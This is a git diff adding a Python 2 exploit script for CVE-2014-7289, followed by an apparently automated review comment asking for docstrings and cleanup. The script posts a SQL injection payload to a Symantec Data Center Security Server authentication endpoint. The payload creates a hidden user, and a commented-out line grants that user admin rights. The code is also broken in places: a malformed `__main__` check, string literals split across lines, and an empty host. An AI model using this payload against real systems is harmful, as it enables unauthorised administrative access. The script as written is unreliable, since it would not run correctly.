diff --git a/Web_Security/SQLi/CVE-2014-7289_exploit.py b/Web_Security/SQLi/CVE-2014-7289_exploit.py
new file mode 100644
index 0000000..9b6839f
--- /dev/null
+++ b/Web_Security/SQLi/CVE-2014-7289_exploit.py
@@ -0,0 +1,43 @@
+#!/bin/env python
+# Reference: http://seclists.org/fulldisclosure/2015/Jan/91
+
+
+import httplib
+def send_request(host,data):
+ params = data
+ headers = {"AppFire-Format-Version": "1.0",
+ "AppFire-Charset": "UTF-16LE",
+ "Content-Type":"application/x-appfire",
+ "User-Agent":"Java/1.7.0_45",
+ }
+ conn = httplib.HTTPSConnection(host)
+ conn.request("POST", "/sis-ui/authenticate", params, headers)
+ response = conn.getresponse()
+ data=response.read()
+ conn.close()
+ return response,data
+
+if __name__ = '__main__'
+ header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
+ data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME,
+ PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO,
+ PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT)
+ VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '',
+ '', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12
+ 07:13:23', '1', '0', '0',
+ 'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
+ -- '' " # add user to USR table
+ #data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID,
+ ROLERID) VALUES (1504, 1); -- " # add user to admin group
+ data+="\r\nan=Symantec Data Center Security Server
+ 6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
+ data = data.encode('utf-16le')
+
+ eof_flag="\nEOF_FLAG\n"
+ header = header %(len(data))
+ payload=header+data+eof_flag
+
+ response,data = send_request(":4443",payload)
+
+ print data.decode('utf-16le')
+ print response.status
\ No newline at end of file
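Review bot: `send_request` has no docstring and the module header is only an advisory URL, so a reader cannot tell from the file what the request is exercising or what the returned pair holds; add `"""POST *data* to /sis-ui/authenticate on *host* over HTTPS; return (response, body)."""` under the def, and a module docstring that names the referenced advisory and states that this is a Python 2 reproduction (`httplib`, `print` statements), which the bare `#!/bin/env python` shebang does not convey. The docstring should also record that Python 2's `httplib.HTTPSConnection` does not validate the server certificate, since the request body carries a `pwd=` field. `params = data` is a redundant alias; pass `data` to `conn.request` directly. The commented-out second `data` assignment is dead code and should either be dropped or rewritten as a plain comment describing the alternative.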